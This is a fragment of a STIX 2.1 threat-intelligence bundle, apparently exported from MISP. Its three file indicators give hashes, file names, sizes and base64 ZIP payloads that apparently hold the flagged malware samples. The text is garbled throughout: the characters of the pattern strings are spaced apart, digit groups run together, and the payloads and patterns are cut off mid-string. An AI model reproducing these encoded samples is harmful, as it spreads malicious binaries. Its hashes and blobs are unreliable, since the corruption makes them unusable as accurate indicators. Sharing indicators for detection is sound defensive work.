"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 164 d b 8 d 1 f e 5 f 2 e a 9 d d 3 e a 826 b 2 f 0 b 808 ' A N D f i l e : h a s h e s . S H A 1 = ' 890 e f a a 698 f 4 d 43 a a d 15 c 3 d b a c b 6 c 0 1544 f d 3e27 ' A N D f i l e : h a s h e s . S H A 256 = ' 56 a 73192 c 75130550294 b 327 b 36 c 0 51841 d 3780 b d 3732 b 410e0 c 190 d b 6 f 9 d 936 ' A N D f i l e : h a s h e s . S H A 512 = ' 27 c 965 d 92 b 452 d 564917e5101 c d d 3 c 254347 b f 919 c 84 b e 76 b 666335425e6673 c b 4 a 2553421 b 13841 a a e a f b f 9 a 9e25 e f 37369 b 3 d 2 a 5 b e e 208 b 4259 d a 9053 c 1 b b 3 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : x a Y s X X z U b b Q + 6 K 4 R 44 u + a U g 0 31 q L D 0 A j J 1 s G B I K / : x a T X X + i K O 1 u 5 u z K / ' A N D f i l e : n a m e = ' 56 a 73192 c 75130550294 b 327 b 36 c 0 51841 d 3780 b d 3732 b 410e0 c 190 d b 6 f 9 d 936 ' A N D f i l e : s i z e = ' 283714 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J h i s E 6 i + J E A C S I E A E J U B A A g A B w A M T Y 0 Z G I 4 Z D F m Z T V m M m V h O W R k M 2 V h O D I 2 Y j J m M G I 4 M D h V V A k A A 3853 V x / O d 1 c d X g L A A E E I Q A A A A Q h A A A A x e 9 F e P X H 5 b o a s 9 o w Q 9 o b C H h Q k 2 M O 28 r W M p + X p u e P F 9 M n 5 s T o Y 3 / D b 3 / n X O u J U c 0 F a i x G k l l C W q k D i e 22 Q B P M n Y u 4 v H i E f b l + H r N o V Y b C r / q C N 8 P T T a M 5 s 5 o T n x H L i I p K u a x X e + F a M Z h l G C r e G 4 P + S N m B a c 86 g 27 V X I F A D J O S f E 0 W x d R l W 1 v B 3 y p x 6 l r b A H P g 9 K X V x G B a v W 3 U e N r r H U x 1 a C T V 0 v Q j q b / D j 6 J z c 6 B i R I z S T E d 0 J t 1 n C R l P R X M G 2 p Z d Q u J G X G L C T u l w u B F U X E e F P A R l X D N b R R K l s M E d b i 0 8 X v + + u 6 l H N 9 v l t f 2 z 9 q I d / m Z x b H i 6 g N J V 4 T 0 e E b f Z w 6 C A y I z I a y g 3 D P Y M g g 8 Z 1 V u K J H t V e 0 V B Z Y T L t B t a 2 b p r x 7 r 24 y y U Z C p D W N F j O s M x d 8 A H 7 O e Y 5 R v 48 s k N u Z b P K k y e W P / p 2 U d 8 v 93 N 4 H q N c 7 c d K V W t G P P P O t W l S t P H U 93 x z y d 9 u J g F x V C W c / 4 Y S 5 q f p s t v m g D t g t I o J 8 c 0 D X t + R X o w 3 a c 6 x 5 m 4 O B 40 l n 9 t 2 f N w k 2 F b L t i 5 J h z V P + T X 7 r y g y D f f g c K i d k 4 B u 5 c N 1 l 4 + n Q l X D p W K o B C / L 1 X y 0 A F C g R 6e5 K V c R l n a a J t f J H 7 y + 68 Y e b 9 c 4 S u U 2 p Z Y D m l C 3 L F a X G G s 8 W n h u j r P h T e 5 a 7 E j / B Z e Q d I d u d F 4 k z 403 r P / + T i u z i F S G O N c Z q a O q q e M b b 5 U u F P i k S h z v 3 G c M m I g F 9 / m 1 h 9 Q B p K W 9 J Y + W 6 a D k P J U 1 M y U v V y h 5 W 9 L 1 I 7 Q V z j W 1 V R 6 y m G K k f g T 0 l v M T W o f 82 z i U 6 y A V z F 5 s g e B U C q s 43 z U Q u W A z / o E 9 N 84 s r + b S t s 1 r C 2 R r + 5 y t j w 97 l C 3 g g g 6 h d d P G 3 L M D x L o U s 7 O I J w b 2 R t X e Z W K U + X E V 7 l H H N S O f B B y 7 i / Z B 15 Q I M l l t H u s O F T H 9 k g o g G u x P A k B 2 h r x Y f l f z T K + k i O 0 A P j 7 G H C W X 0 p e y p x 1 J / 12 N t u z o 1 r 69 Z T K U Y y 73 s a W F Y / i Q J E h A 6 O j o 55 + O Y a z k J X O m c v r E w N W M 5 r R I u 3 U C P 0 9 g y X N I 6 j 2 I h 5 j + / j 2 R D m 8 k h 2 h u U m I 8 c I 9 G 4 n 86 n x U W R S o t b d / n B D h V 5 A F k y q Z F g o 8 v W + 8 Z 1 P j Z C i I O E L K J D l c w 8 u 6 i 8 K D Z z 1 Z M k G b g Z / Q A Q 7 N T q 7 T d q M T p r V T y 78 X 0 v t z P t x c J 0 1 n w b K i z q Q B m p A P q F y O k a V V 4 Z s Z D s 0 z Q N t d O N 1 V 60 K L t G B g s C Z + j 5 O 6 N 7 O Q z u b h s J N X m 3 C g g o E y H Y A f u m I f P B X R V d N B j r U e a w D o S G c / s q M 0 6 r q Q X 8 a A 6 G 7 I R v V 9 b D k l f L s E l L y 0 o Q P 5 q u N 3 A l c V o Y c q Z z w u 6 m 60 Q G v w X k H S G 7 C / J x V J T 3 L w 3 v 2 A u p V E v + 68 n D E s A b + S e F I j A C W Q o B Y U p Y 4 b G L 23 b l S w Q 9 g I a 7 B t / R L 2 A 75 D L J d m Y O x d V Q p W M M 1 i v g x k F V z 7 f S 3 P + X y m 86 j r d e r W 3 W U b g M P B v P 6 k U r W w c z g e M I 4 y 0 n R B X b l K O 7 O S Y 5 v w I m S w 2 k B a P F r / m + B r + h D m s S i a L R + g z 8 W k B p B m 6 s x Y b + Z R T J 3 p g b 37 v j D q v 8 x C + E + G i 7 + G X K s b O 5 O 0 N q Y y p m L C j q Z E / V k Y C Q f Z N p w C G O u z D U / a s E 7 W l 8 V y S D + L r G a + 7 Z b f r 4 / q w E T i b I x x 0 E c I 7 G / e 8 H J P 7 W l N u F u E K V B l n p u 1 Z Y 4 f f e u W w I 9 C 40 c 5 / 54 E W C S Q z 5 H p b b B 0 U J R g H h n w d K + v u I s n d r 8 T E a w z N P + Z 0 u x d T 8 k d E C s j Y q G I 2 E E o n 27 q 1 f m x M S m v 8 r F 5 g A c x 4 O w Q + I 9 b m e E x i j C m 0 b z e i m C q H r j N G g I Z 6 A X a G 7 H v d v 52 w 7 H B / P c g P L g P X H 26 d g D 6 V u v B B M k s 4 c 9 c C h v d a z L 66 z x A v v r T D Z m b T O w q I 3 F s G z 2 + 20 M T z g a c f g Y l Z c I B J M B i p C b a v o o 1 s h 0 Y A Z U d Q G o b R F m L H I 2 v b o I 0 C L c X Z + S 7 g r b D F a + 8 e E 7 h Y s D J V K r C N W 7 L l M m J C G F m U B Q p p 3 g K Z W r / l 1 P r U o S I M l Q z d Z b q E Y g Y c L n m y G W n M Y Z J 1 u r L Q P A L N 8 c y L / 3 f Z a i o J S b U B T m 91 q z y z j u t v q d N v 9 T E B 16 o Q 4 V t s Y R D n s N W W 1 + M i v O L a k I T T H g b g D z A g 0 v S S w o 0 F B w T 6 E C Z t Z j r J 2 F O o M B f I S 6 P Y z W I N v p n b 6 C C 70 S 7 W 2 n v w 2 q t W P F + F F / j 9 R q e 1 z i d N l m v R Z 5 v u T I W a g g 0 f 0 0 y s s V i w S / y t R V 7 b Y + Z u / 2 L e l z J G 4 A l D q 2 c 7 M G h / e n Q / W q R h V Y k m c B I / f 6 j n S i E v P j G j 1 d B 6 q C l p y 1 i A K 4 E v k K A E x P e r n + L D 8 S o 7 z 43 h c x M s 6 p Z x M V 6 + e P r f y O P i 7 y q Q h y Z + 3 V a p y d i f x 7 Z d + + j j C U 0 D b O y t p J g B e x G m k F N p I P 9 z w 8 B i n R a 8 W 58 C u G w N L l z r z A 0 r J J s r l p l 7 J 2 F x F o p K M c 29 I Y b X 2 X y n s 0 W a C 79 t 69 z U 3 B I Z u o d q C T 8 t j Q S Z + G q k i n 1 K e 7 m 3 s 7 C R m j l m q v 0 4 v R I w G y h 96007 o d E e C O j c i E A F f J K l o H q A n 1 m H z i L K l T G k n 1 P J 8 C a L U h D x U W M G 59 J I n q 4 E b 6 y Z z / z F R i I p h 27 o K V p A R + V 13 i r T 7 L T 7 a Z x p U X 6 B 2 k 79 H / n F 0 92 I 7 O I m 5 / o p h R 4 q 8 g N g N a 4 h k K k c X 2 A h X j H d E e i s r 5 s 8 d Y l G V l s a v J p K R j k m O J D f w o X 2 H 5 f X H u D r r Q 1 N w a n d 8878 w k c K z H 6 e r f 6 r H V S N Z F s q j r 4 Z 9 g h p q 35 C t y 6 h d B j C n A f 4 A K p C l X Z r v A G 50 g G 22 P h A s p A k A 1 O u 1 G s i y W a t Q O v g M 8 F z p k B s + 1 k i 1 i e 1 i h p 27 g w n v S s 8 j g P Q O 6 Q y 1 N v X B s o d B S L 5 W 6 a K T B e n c X Z P C A b B 9 n R o A W O 4 C q B X M G M T M S N n S 6 J d C q n E n H 1 X U O Q M J Y q Q 5 F j v Z Q b f f H s b u k K X C R Y 4 g b n T + Y 7 q f e s b 7 t / Y y L e U g a t b R X E n B d 9 Y s F b a 8 F X F P Q + g O y 9 e Z o v H 55 I B U l 9 U O H g I L r i 9 g L 1 k b / z e 8 g + u p w q E g j / Q S 3 q s D Q F U 69 v C y B L n 7 j p p R C w n s 0 p p X + 9 t m F s 9 p c F d y v Q o 5 o 7 L + 5 q A H o 0 g i 77 J T Q B y H V r s q L b 5 K q / W C 4 / l n C 17 u 9 f + y L 4 p 8 t 1 + V r p d C c 4 B H a K K r i A u w c x b 41 Q a I o w N p V G r L P I m 8 L v o h u K s z G r P x / D O 0 E S V m 5 d H j G 0 s 3 G F i a E l k / X U O z u Z h P W h h s l 8 d r d s k O J I W I l s 5 + s b I A 38 X q L W K M Q s u f B V q C D 2 N a M H R e F Q 3 r v 5 V r f q 9 m 7 Q c D g q T T P l 4 Z l h T w r H m W M l / m G 2 J W Z e V O f 98 b Y 0 j N J H 3 E W 2 b 8 Q x E Q j m 6 / A K S Y q c h L o 4 D m + 6 t j B h j d s 81 s 6 x C l Q 6 P B l + s 64 u U c d z g 0 2 E A W q 8 o J E s 4 + b 9 x F l u b x E G N 2 K g 0 R V D R B q 3 k 6 e V m H Y 2 t e / v P 0 x 9 W W 5 e a 7 Z o K + Q I 5 z e s c s 97081 x w Y s 9 Q H v 7 H I J 3
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:29:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--9608228e-4373-44ac-9fdd-bd37d5b02275" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:48:55.000Z" ,
"modified" : "2019-05-16T13:48:55.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 0 8 b 49 f b 9882 b f c 8 f 69 b e b 594 f a 543 c 8 a ' A N D f i l e : h a s h e s . S H A 1 = ' 201e85 d 6 b c 519 e c c 6 d e c e 75 b 2586e761 a 56 d b 6 a 7 ' A N D f i l e : h a s h e s . S H A 256 = ' d d c f 49145 d 8 c 78198138 a 488 b 7 f 99 b b 4 f 760777 b e 41 b 293138e4 d 5 b 531 c e b c 73 ' A N D f i l e : h a s h e s . S H A 512 = ' b 4 a 446 c 95e7239 a 3e491 e e 38e77 c e 8e1 e 96 c 27 c a 9 c 1 c c 25 c a 941643 f 366 c 62 f 81 e b 9942 a 1 d 80304 b f c 321 c 24 c e f 86288 f 315 b f 97 e b 5 f 3738 a d 3618 f b b 6 c 86 e b 8 ' A N D f i l e : h a s h e s . S S D E E P = ' 6144 : m c 67 O z U c o X x C 24 w O O L D b j R C 4 x z E 7 m k H N w + 4 j e 6 i M l l T : m c N z x e r 4 f i D b j R h G D H 9 O e 6 H l 1 ' A N D f i l e : n a m e = ' d d c f 49145 d 8 c 78198138 a 488 b 7 f 99 b b 4 f 760777 b e 41 b 293138e4 d 5 b 531 c e b c 73 ' A N D f i l e : s i z e = ' 252891 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J h i s E 7 l n H e x B K s D A N v b A w A g A B w A M D h i N D l m Y j k 4 O D J i Z m M 4 Z j Y 5 Y m V i N T k 0 Z m E 1 N D N j O G F V V A k A A 4 A 53 V y A O d 1 c d X g L A A E E I Q A A A A Q h A A A A + d v N 2 s v q 4 e k s M O T r L i E Q j i s F n V R v e d X g V O 0 6 / m e y B N C z J + c k Q R w 5 r B 7 f y 3 X x 9 b 6 t T x y y / k m t n + g m R R b U W X I 16 a i i w 82 j d a z w p q u v G j 8 y t 1 K G + C B Q o F J 0 k O J 6 y U J r 4 T 9 U q t 6 B f t z 6 s y K j z I O A j + i l O F p k o 8 E N 7 + I a o m K m i C k q z w E T 7 + N o X b 0 T s D n B o z 9 / 4 O S W y x 0 6 S U F X / h i R P B 7 o r e l j x k N Y i w B E X P D b / E e h l 6 o l l P z u 2 E L M a 2 T 2 v B r x X G L 5 R C J D p F g P 6 b I f v M / Z r g d 2 G D x 0 F C L U 20 W 2 L b k L 4 J L n S O r u J T B 1 O u + 1 + 2 y H 9 X 5 Q m y M W 2 E G F N 0 o d q u a G M Q t f V b D T Q h h w Q V a z N T J s i u J V w C q e i u O J W y t j U m U n n Z r 51 q y m D U o 9 Y 4 A m E H Y 8 f D f j J F k V Z s e e 1 X n j F Q d D l 8 x 5 E X M p + 7 p K 5 b 7 K E K Z r G b k P D a J l I S e H D N o W t k M r y Z y m M f P U E D N g 9 F 7 b a K / D b p T W h E + h Y A m 6 t c v M W m y W w g / m Y I g 1 O g M v 5 + r G F 6 e x j W y r 3 f v I G e X r c o e C R D s c W z p W X t W s u 673 L L Y i j U Y 5 A K H I E + z 1 g 0 b + f Z O Z z f 3 G B t S N / a x 7 m 1 U Y + U J 36 o E w V 0 A D 2 i S N A D e p H A F D 1 X Y x y U J 10 p Z L x C 78 G B n e N O V z G + o G h l + j m T 5 C f A T B n g l F c u f c r 9 q 5 i O + s e 2 E y U h 7 i 2 R D / h Q T + 2 V f k Q / l J u R f 6979 z A / t I H G z Y V i E 9 s / q y y + 1 m l F s T c x w O 8 e m C G 81 l X O w h H R a G U t N M P E L d E I e o V m Z W b A S 4 D r D P E y Y 7 Z Y v P u L g X + I f P N 9 B B n S q h w a j s v O s y 11e1 K 86 K u / E 554 n q S I n V F G N l w X V c X Y Z T u 4 D / m + 35 v h C 0 V + M a j Y v 8 e q 6 k i e c S c 3 V T X 1 L i m z 0 L P h 0 0 + W 98 k j l + k 3 z u X Q 7 Y K 9 f 7 w i r D X f y c 1 A 6 d d K U 77 H p f X p A A d v v K 2 r j V 60 l G S K / U E l 5 S s G 5 I p 8 d m K v k T A 4 l W d t C I c F j g o A e / L q S D 9 D Z v / l 8 V q b D i l y o J h y J D 3 A s C C o Y E q d K J o K n 9 D m / b K V N y l 2e3 W 3 M d y n 8 g q k A f A b h y U M V j v I x k 2 Z N w c d y b q r b g t m Y 5 p I 1 + U a U B l 0 L v C P / O M M j 7 u B M l F B 4 e Q P F C E u B O Z a z e y B b r 9 i r 7 g r Y M g O H 6 / C n z h p g P + x P f q 4 R G b Z L a W P D P Y 48 Z B k F F J 39 g q D k w p 84 t 0 G 1 G 9 H X 5 O y e 2 d B 6 Q A 1 b l b G m U u T d w W r T 0 8 g W X 0 b 7 q N S z z V e b l O v 0 J 4 R v i r a 3 M O r a o H 82 Z F J I T O k t 1 f a C I t R d 9 x K u 4 K D n d O v Q n P x L 6 c N b J s o b e n S v m R P Y g q y E R h V e s z V O g J 6 L g Y O O R 1 / k 8 e B d Y U h + 0 i B X F 4 i h x u O r r S C f L E x t F H I h e f d e G J B 9 W p N 6 G M 9 E l u k l t u z 5 c s Y A P w S v F a K j 6 G V 1 J w o k W z 19 k i L 46 g h 0 t F f s g L y s i 64 r 6 J w i Y O q 3 p x N K c m h 7 S G J m i C p O K V 6 B A V W e y F K e L Q E G f i G p 2E2 s W F 8 Z b 19 u F R v N S n g K q r 2 Y l d Z u 7 t R e Z z 7 c N D w k Y M n x F H y v a 8 k P 8 h o b G I o G T C z I z K n Z E r I C L c E w A k g B L 216 P g T R 4 W c Y K a p 3 U o B k T T y X k A l k C j C v 8 K 8 n 5 n X K 5 l f P X i 76 P U w w W z n X I N M G K 0 F u q 2 C M A X 8 x K r U N X k D K O H u U 4 w O M h O h i O G e B 6 L j T 5 + P 1 I n o l 9 w g v r U 3 Z A i W 539 r a q i O f l 2 g 1 j V Z + C b b c x L K l x r t 0 b E h O M m 3 Q q u G T / 2 c s v S 0 f F e k 8 Z N r q G + r C w o S A N H 1 j 2 z A d h F B t S F V s r 5 y t F j n O m 9 j w 0 Y N E 0 v k P C f o i S 0 N Z G a S Y D G O 3 n A j y i X q y z O + 2 h R Q r G W u 13 L x u S Q C w 2 r i R h N 353 G m I d N o b 3 s q I s e 6 r 0 3 V Q q Q / 8E5 Q Q Y 2 / 5 m 63 B S 7 a t 5 o q c S I u 2 I y y t 0 g B d 2E2 i H A z S h I 43 m d J G x G o t i h S G u v g / e n Y 2 G d l N j d 3 a Z U D U R l G X G Y D d J t p W Y D 7 P k f B u U Z E I G F 8 I C l N F w p U c h M y D i V d v P J A d t m C J O T C C 9 o 105 u q k z g 7 z l R 6 B C i g m o / v O 0 k x x l 5 p f J 5 R J d w W g + E W U V T U J N N T / d M z k 3 M r 2 + m i X 2 y y f y w 51 q b F V I C O M A e A 945 N 26 H X 0 x n b + t r G + w e 77 V t + + L V L p / U Y 4 P 0 B 6 O S o U B U q v d p n t 6 K o n 636 Z P G N N g Y Q y 5 m j c V V 4 p L O z F n O s W m Q N M 8 x B Q 2 x / v F G C 0 I X / E l 6 n g C O / L V k t M a S x t 9 X 249 M h e w 3 B X A m V F Q 8 b 2 Y o D 2 j i w L / A 7 f y h z U C + h s T i 5 U 4 b u s I I E K 1 L J c A L / b R 4 P 1 Y q g W K j L e M t t a s l L T R s I 1 x t e x r 8 K 71 g t 7 x B P s S C 3 x W A 6 h 53 I e 3 / P E B X 9 V 2 q M J 6 T P 2 S j r X w f X + a h W U q D s r l 55 X I E P p 7 Y N h / O p g 2 Q b z i D 6 K i 3 G r 2 / I n m 79 C 8 a c + 2 Z d 1 T U K f u 3 h 29 j f 6 L d 4 U / Z u f Q g B f H j b Y 8 W F t J M c s L G r r y D B G G R s O s T W I o E f S J e o x C N c 6 s k 0 k d z i T R 566 Y B G I H S R O s Y V 2 G j l Z S 95 P Q S P n 2 i D R N + v D i b Q B 5 R x C U H + z m e 53 f r 2 i V t D f o 0 r + r f p H 0 A G J f 37 c R 2 Y P 1 G j 7 n 9 Q 8 i y Q E 19 w U l k E 6 Q 5 F 9 I 1 A s G 5 Y b n I 7 W f U y u q b P V a t 49 L R X b h i J C R H 5 a M s T W 1 q 4 i O C r W e F 3 k u e G l y W P d 8 P i a R 4 P c W z d / X 2 c C O h U v 45 O D 4 o 6 A P N 8 J M A 8 g n 3 J K i j A f + M V 0 V J B v / g V C J s D H e A i / 5 R z P z v q p 4 K C R 3 b Z i 0 l 2 z N P j r F p M y I v u X q T D q e f J q Q j R m o X S 9 x W W q C c y P p U N 37 V f K A J G g o Y q p j T a N h B U + e r K n M x E v J b + E X n d T H M y t L / N 2 Y L c t 894 l / r 2 f t g 6 o M Q 8 M P V z 7 x W z 94 h l L A r 2 D 3 T A k D O 7 f j v T q r N / K M s p e e o H c q j l L p z G M E 2 Z / g 6 V L S J H 7 Q 7 R X W d 8 v 0 i s B Y L i R s 3 M T r r w 5 K 1 h l Q H s O X T u r j 1 H q 2 k t s V y 7 k r u z q u X N C G D i h 83 z C / h S 8 Q 12 p j z B F v R d b d e o V / O t q O a M 85 J U N A 3 F 3 v d n 5 t j Q M y W 0 / e / H 5 A L O m s W 1 v W Z a U 4 T / f Y / g u / a z v M P c S 8 k Y Z + + O n 5 V M A n 4 r 7 c j g u 6 q V 2 w d r z U P + a s X l L 7 D D a V W C f e N c z K X Q s X Q c 2 Q V O c c A H G K W m Q a 68 C C q q g B Q V X J P W g s k 2 N h k z 2 n b f K 53 j G E 36 n s w F y I G x t 0 Q 0 h A 3 i f G z D B A n 4 R p 0 h t n h u 786 / 5 Y f K 3 A n + R F T g F O P O 4 X x 7 x u E 41 k k O + B 91 Z h A f J g V q x R + z U / r 9 E J E + h A C F D J Y D u 1 L / o A H 2 a o 2 J H R E 2 z + 6 p 1 S H q i M j d 2 x g G J V 0 F 1 X L t G H 9 V 9 A P z k p p d H u 19 G M L i 4 h k Z k s c + p U J 4 o 3 R L c 3 Q i 3 a W k C f 50 v k a 2 m L q X S K 78 A w 9 R L 8 o + u t k m W + 1 S Y 6 R d E 3 s 94 Z 7 G R S D a Z 8 Q Y 9 R J / 2 o P 5 K W j A L O r r / B / 8 T b 6 u p g 6 O 4 + p y i c C p e 81 f d I
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2019-05-16T13:48:55Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "file"
}
] ,
"labels" : [
"misp:name=\"file\"" ,
"misp:meta-category=\"file\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd" ,
"created_by_ref" : "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e" ,
"created" : "2019-05-16T13:45:09.000Z" ,
"modified" : "2019-05-16T13:45:09.000Z" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' 1 b a a 0 24 f 9 c f a b 48 b 92 c 297 a a 406 c 91 b 5 ' A N D f i l e : h a s h e s . S H A 1 = ' 7 d 5 a 1 d c 90 d 535e3 c c 552 d 0 d b 0 2841 d 28 f b 1 a e 773 ' A N D f i l e : h a s h e s . S H A 256 = ' 0 f b 825 d b 2262 d 98e29846 f a 67171e3450666 a f 9 c 0 a 6 c 31 e a f 8 d 7 c 84539 b e 9132 ' A N D f i l e : h a s h e s . S H A 512 = ' 4137 b d 777e8167 e 964 d 3 e b a e 98720 c b f 532 c c 0 a f a c 726522 a 668949 d b c 841150 a a 4 a a 600813142 b b 9 e c 6 f 999 b d 97 d d d 0 7 b 9 b d f 885034699305381382 c f b a 6416 ' A N D f i l e : h a s h e s . S S D E E P = ' 12288 : J n 4 i j M b 7 m 7 M U e G A p K W x w 1 R F n / 68 R 4 V 6 S p 22 l e U W d 3 F M : J n 4 i Q U w Q D k p 6 h d V M ' A N D f i l e : n a m e = ' 0 f b 825 d b 2262 d 98e29846 f a 67171e3450666 a f 9 c 0 a 6 c 31 e a f 8 d 7 c 84539 b e 9132 ' A N D f i l e : s i z e = ' 447466 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A J l i s E 7 l 2 B A U s 44 G A O r T B g A g A B w A M W J h Y T A y N G Y 5 Y 2 Z h Y j Q 4 Y j k y Y z I 5 N 2 F h N D A 2 Y z k x Y j V V V A k A A 4E53 V y B O d 1 c d X g L A A E E I Q A A A A Q h A A A A 9 j N 7 K 3 s n o 1 m Z E c R / A + X 5 i X h K 88 Y / T 9 D w 12 n P f u V C 6 e k a 4 Q m Y K s u y z n q o T p m W j e 8 j Q d R 2 H Y G I o I d u Y + Y S E / C Q P p Q 1 F J m a n i Q 4E4 q X 9 k q J w e J E T a Q s J a p h 0 N 2 W F l m l f 8 H t z l + R X O w m r y J f 0 3 p 2 Y u u Y q g y A H Z 7 + u p q Q u x W / M w a t 1 r m S M V w u T 44 h h 2 X L j j D U v z n N f C i D Q c A p i 0 s S I b 6 b E b s M L D S A R Z y P H r v 6 i q k E w h W i 5 + h y y l n c 65 W 5 r y p C E Z n c f 22 x o C W V f 3 A P C i F U g l y f C 1 C D 9 M j 6 T k b j S Z z B U c C F H o g G L M + w s 8 a Z Y f 8 I + I 9 v 3 r w g / s P 5 Q W T D x L z 9 Q Q E l B b e d m P 6 n t M D p j Y E U y t U P 7 Y f W 0 7 L L I + C i x J + v f 0 Y 1 + Z j t i k O L k 4 Q X q e a L 427 J E / k 9 F p s u / I i v k U G g 0 L V n c G c 26 j Y V O d + f n x l x p 8 j 2 o z t y N 2 e V g S U Y R Q m c Z H j N p M x l H p J O j H 0 w N R 5 e z 0 s N k 9 Q i m F w d 0 X 0 X a c f a J J 3 J A F C C w v H R c C B U S R j R C h l e h 48 Z g H e 4 K s N x 39 r 30 F d o e / r / o G M v 3 K u D A Y t W L o t M V c b g k h 5 i M c 7 F 23 n o L i s J h B g l E k 7 q 765 R b 7 Z L J 1 x + L i U I Y R 0 H 3 H X C 4 Q 4 z d Y m n Z T i 0 f k w S D B E x z s m Y 4 R y 8 l 7 Z o t 4 Y 5 a b 5 W 1 a B u F m + N d B 18 J e g o M I W f F w V / p 3 J n d w Z D / u M s z M v Z g l 7 C 1 n j M f 5 g b 1 U B + m S f 65 i 2 Y u i B d B 8 Y 4 y d J C 69 L o H O p e G V 1 n + 4 u e h v Q g 4 X 6 u j f m n n J C / 68 r k r i M A D 1 / B / e o v g V 14 u 3 B w / z a I f K A B U W / X k B 0 141 Y L + E d M 9 Y P 17 w 7 / Y + 5 C G t P j p U k u V 0 V g B O Q H J P q 67 A F 9 b g O o P E B 98 u f r 239 g 9 w p A C 500 p b 6 u n i L s E 7 g u H M C 1 q Z g k c 3 d B g / o x n L t f 47 V E E w f 68 P 8 h p H O 88 f v 37 C F G w 6 K T X C 7 L Y v m D p g s X g n P e g T j u G a V e 217 p Q p x C + U + F M z M J O F I E D V J 3 X p f Y 4 b b Z E X z B I i P w t r X l D E 9 R v W Z V h y U W v u x g x m h J J z L y 8 Z w w S V k t w w d m Y w V t e X 1 b 49 U d R M K x q h S + A Y u A 5 i j A 0 D S I Y N 2 I T k K R Z T A k X f X 1 y Q K g h B q s h O P g k b U r I U O x H m e G z n U k h o Y n + X P k 0 H p 4 C d 3 o H z m 3 D 53 u 1 D V r n r 1 / D f 8 h f X e Y u z n k I B N I K T D c 3 N x 289 Y 97 e o M n X q J o 9 B V b / i l a 48 t Y P 0 t Q J k 2 V 9 P 2 M H S g s M i R d o n 7 T R b L L z S A v Z n 11 y J E X n Z a 9 U q f D Y 4 n M F z Z u z 1 M t 4 e Z e 2 A 3 n + 3 s l 1 k t A x A + s L 7 g q T V U b n S r N Z f g Q i M v j o W 4 M z 6 B R 3 / 1 S Y 6 W E Y 2 w F l f W Q H n m d l K j K t P + 5 O 3 c K V 1 E J O n y P t t h Z q 8 w N + w T A w c L z S 5 V Z o y d g a X n K 9 a X Z q J f F 5 X D c v H U 4 X L g L e b 0 e C v 115 d 8 s 0 i V o 68 v E a C G L C c 9 O O W s 947 h H J Z V f U M y g d s H a R t m / W O h h h 8E9 D y C L l L Z 3 a R 7 Q 48 A F t d d t E w x Z K r g j u x C I e / 9 g h H q J M j f b p 4 C 3 W h G k L b E Z v B X / G r D a t 32 g v / a h 0 X L O / + W 8 m Q j D 0 R l 2 C D 9 w a b j r P F F w + W n x u L n R t I R r A j P N 5 s F F n q z 13 l X B 8 h O 2 h K V p a a d t q Y o Z h x J c Y G 7 / L o D d L w F z W E s e j 8 c 8 L c g g 36 + j j u J N g w n D J V q n V / 1 / + U m N d t A X G O h n p 5 G f O t f z I x q b m r X S U a 9 g B X M v p L / u r 0 N w D F S t 3 g 0 d S R E y n 6 m u 3 s v y c 9 p O z t 4 m M F p T U z R b i k D M 6 L n / j V V P Z i A m 16 J 8 h e 8 T U M M u S 9 D 6 r S M L f w 6 Q K w j K r V l v e v 48 D Z U u S t u a 0 n m g 5 X n Z B B s g u S 0 R v O 3 v D g D 5 X n I B p g / o 8 y m d a e U Z N r + 6 K W T H 0 9 u h I Y E t r B n 3 v 9 L 4 D I P Z 6 j O S 0 B x Z 4 k Z m s W x l U c O k o z V a J M O k v 8 Z 4 Q g 9 d L r 7 i h 8 e k e G D x k 7 D s K P Z f a 95 v W G y M g f i n d 53 R Q k 0 i g n v q 5 b N G o t O C r h i R E U 0 C i 1 x 8 p k 4 g N + O 0 9 o O l f t + f 9 f t j 2 X R V d 3 Q u 39 r 0 m a E D T R A M M 2 i C 6 c 3 A 6 v I F 9 v u f G h m Y o V z o U q l K i + 8 E M D 724 e i n q Z C u B B H b S 1 o 8 h y x 5 k A O D A J 0 x e n Y G m l + A F R B C E F m g d r C 51 J T 5 G N t 0 H D 9 o O y v 3 R 7 l 2 / 3 N j M d f t g m q E S a l 2 e Y 9 s v m J J K f 8 + h x 2 w s 8 i O k E D 41 i V l k 2 n 59 B T 1 u l j K G Q 4 H r c 3 h 0 l y H 678 v A 3 t A 7 n w u L G n E w P 9 A q o q L K 9 j M M t L H t 8 H Z K b G O w 1 B B g K m F Y Y E / f 6 Y b n g 2 M n m A r 3 f A L a K b I X w h R X s R E e V 3 u 4 b M y / x Q 43 s f U Y g 8 y 9 M z o n M N R a X 7 W Y g V k B 4 a m w T 2 T 0 t 5 h f I y g N F b i 0 m h Z r C 9 m 45 v 99 m f k 53 n + X F d V w / v S 0 d / u W U A q u 1 B D 8 o c E L i d K / R A J 1 y X c B l 26 K C Z F N Z q 1 S K H x K p 6 l e Y M Y C L B l m w j k 0 R Q + + 0 U K r q s V w E / D b 7 p 2 k d Q + + r v r Z D B V j r E c Y g K M B 4 e A Z j 9 Z Z e d f w l D K A l / I j 0 R 9 p b I p 7 i M T 4 I 0 G Q x I R C S 8 y 3 k X A 0 N P D E w R R k 39 l v H D Y Z F h 9 w 9 T h H a I 8 a T N z j q c 9 E h d 9 D b v R c q i P A L 8 O 37 x 600 M L A Q J o 7 